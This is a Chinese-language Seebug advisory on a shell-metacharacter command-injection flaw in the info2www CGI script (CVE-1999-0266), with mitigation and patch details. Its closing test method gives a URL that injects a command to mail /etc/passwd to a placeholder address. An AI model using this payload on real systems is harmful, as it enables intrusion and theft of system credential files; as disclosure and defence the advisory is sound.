RoarSmithinfo2www远程执行任意命令漏洞

2008-10-25T00:00:00
ID SSV:4291
Type seebug
Reporter Root
Modified 2008-10-25T00:00:00

Description

BugCVE: CVE-1999-0266 BUGTRAQ: 1995

“info2www”是一个将GNU Info文本转化成HTML文件的CGI程序。

某些早期版本的info2www脚本实现上存在输入验证漏洞,远程攻击者可以利用此漏洞以Web进程的权限在主机上 执行任意系统命令。

问题在于程序脚本没有过滤用户输入中包含的一些shell元字符,远程攻击者可能以Web守护程序的权限(root或nobody)在主机上执行任意程序。

1.0-1.1 临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

  • 如果不需要使用info2www脚本,去除此脚本的执行权限或删除之。

厂商补丁:

Roar Smith

程序作者已经在最新版的软件中修补了此安全漏洞,请到作者的主页下载:

<a href=http://www.gnu.org/directory/gnats.html target=_blank>http://www.gnu.org/directory/gnats.html</a>

                                        
                                            
                                                Niall Smart (njs3@doc.ic.ac.uk)提供了如下测试方法:

访问以下URL可以将系统的passwd文件发送到攻击者的邮箱。

http://target/cgi-bin/info2www?'(../../../bin/mail your@email &lt; /etc/passwd|)'